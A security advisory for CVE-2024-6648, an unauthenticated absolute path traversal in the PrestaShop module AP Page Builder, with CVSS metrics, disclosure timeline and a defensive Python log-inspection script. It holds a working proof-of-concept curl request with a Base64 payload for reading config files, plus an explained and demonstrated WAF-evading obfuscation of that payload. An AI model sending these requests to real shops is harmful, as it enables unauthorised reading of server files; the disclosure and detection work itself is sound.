[CVE-2024-6648] Absolute Path Traversal vulnerability in AP Page Builder versions prior to 4.0.0
Ap Page Builder is vulnerable to an absolute path traversal that lets an attacker include system files by modifying the Base64-encoded config parameter submitted to apajax.php.
Summary
- CVE ID: CVE-2024-6648
- Published at: 2025-05-08
- Advisory source: Incibe cert
- Platform: PrestaShop
- Product: Ap Page Builder
- Impacted release: < 4.0.0
- Product author: Apollo Theme
- Weakness: CWE-36
- Severity: high (8.7)
Description
Absolute Path Traversal vulnerability in AP Page Builder versions prior to 4.0.0 could allow an unauthenticated remote user to modify the ‘product_item_path’ within the ‘config’ JSON file, allowing them to read any file on the system.
WARNING: This exploit uses a Base64 payload, which may bypass most WAFs.
Be aware that it’s possible to obfuscate a Base64 string using special characters to evade detection - the base64_decode() function in PHP will silently strip them out.
For example, the following is a perfectly valid Base64 input for base64_decode: Li4$vLi4-vY#XBwL–2NvbmZpZy9wYXJhb-WV0Z$XJzLnB$ocA==
If you’re using ModSecurity 2, prefer base64DecodeExt over base64Decode to mitigate this technique.
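The following added example, which is not from the advisory or the module, reproduces that lenient decoding in Python so that logged apajax.php requests can be reviewed the way PHP would see them. It reports the decoded product_item_path and whether the config value carried filler characters; the function names and the second sample URL are constructed for illustration, and the strict decoder stands in for a filter that rejects malformed Base64 (an assumption, not a model of a specific WAF).

```python
import base64
import binascii
import json
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Every character outside the standard alphabet, i.e. what PHP's lenient decoder skips.
B64_JUNK = re.compile(r"[^A-Za-z0-9+/]")

def php_lenient_b64decode(value: str) -> bytes:
    """Approximate PHP base64_decode() in its default non-strict mode."""
    clean = B64_JUNK.sub("", value)      # also removes '=' padding, re-added below
    if len(clean) % 4 == 1:              # a lone trailing sextet holds no full byte
        clean = clean[:-1]
    return base64.b64decode(clean + "=" * (-len(clean) % 4))

def strict_decodes(value: str) -> bool:
    """True if a strict decoder accepts the value (assumed naive filter behaviour)."""
    try:
        return bool(base64.b64decode(value, validate=True))
    except binascii.Error:
        return False

def inspect_request(url: str):
    """Return (product_item_path, obfuscated) for an apajax.php request, else None."""
    parts = urlsplit(url)
    values = parse_qs(parts.query).get("config")
    if not parts.path.endswith("/apajax.php") or not values:
        return None
    raw = values[0]
    obfuscated = bool(B64_JUNK.search(raw.rstrip("=")))
    try:
        config = json.loads(php_lenient_b64decode(raw))
    except ValueError:                   # covers bad Base64, bad UTF-8 and bad JSON
        return None
    if not isinstance(config, dict):
        return None
    return config.get("product_item_path"), obfuscated

# Sample 1: the request URL quoted in this advisory's proof-of-concept section.
POC_URL = "https://preprod.X/modules/appagebuilder/apajax.php?config=eyJvcmRlcl9ieSI6ImlkX3Byb2R1Y3QiLCJuYl9wcm9kdWN0cyI6IjIiLCJ0b3RhbF9wYWdlIjoxLCAicHJvZHVjdF9pdGVtX3BhdGgiOiAiY29uZmlnLnhtbCIsICJjb2x1bW5zIjogMX0%3d&p=1"
# Sample 2 (constructed): the same value with filler characters, as the warning describes.
_b64 = parse_qs(urlsplit(POC_URL).query)["config"][0]
NOISY = "$-".join(_b64[i:i + 9] for i in range(0, len(_b64), 9))
NOISY_URL = "https://preprod.X/modules/appagebuilder/apajax.php?" + urlencode({"config": NOISY})

if __name__ == "__main__":
    for sample in (POC_URL, NOISY_URL):
        print(inspect_request(sample), strict_decodes(parse_qs(urlsplit(sample).query)["config"][0]))
```

A request that is flagged as obfuscated yet still yields a product_item_path is one a strict-decoding filter would have passed without inspecting.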
CVSS base metrics
- Attack Vector (AV): Network
- Attack Complexity (AC): Low
- Attack Requirements (AT): None
- Privileges Required (PR): None
- User Interaction (UI): None
- Confidentiality (VC): High
- Integrity (VI): None
- Availability (VA): None
Vector string: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Proof of concept
A POC has been published by n0d0n: https://github.com/n0d0n/CVE-2024-6648/blob/main/CVE-2024-6648.yaml
curl -v "https://preprod.X/modules/appagebuilder/apajax.php?config=eyJvcmRlcl9ieSI6ImlkX3Byb2R1Y3QiLCJuYl9wcm9kdWN0cyI6IjIiLCJ0b3RhbF9wYWdlIjoxLCAicHJvZHVjdF9pdGVtX3BhdGgiOiAiY29uZmlnLnhtbCIsICJjb2x1bW5zIjogMX0%3d&p=1"
Patch
See: Help Center - PrestaShop
Timeline
| Date | Action |
|---|---|
| 2024-07-15 | Incibe reports the vulnerability |
| 2024-08-16 | Due to the severity of the vulnerability, the large number of affected themes (over 2,000) across multiple marketplaces, and the time required for the module author to patch all of them, TouchWeb requests a one-year delay before public disclosure. |
| 2024-10-16 | Incibe accepts a 9-month delay |
| 2025-05-08 | Incibe publishes the vulnerability |
| 2025-05-08 | n0d0n publishes the POC |
DISCLAIMER: The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken.
This advisory and patch are licensed under CC BY-SA 4.0.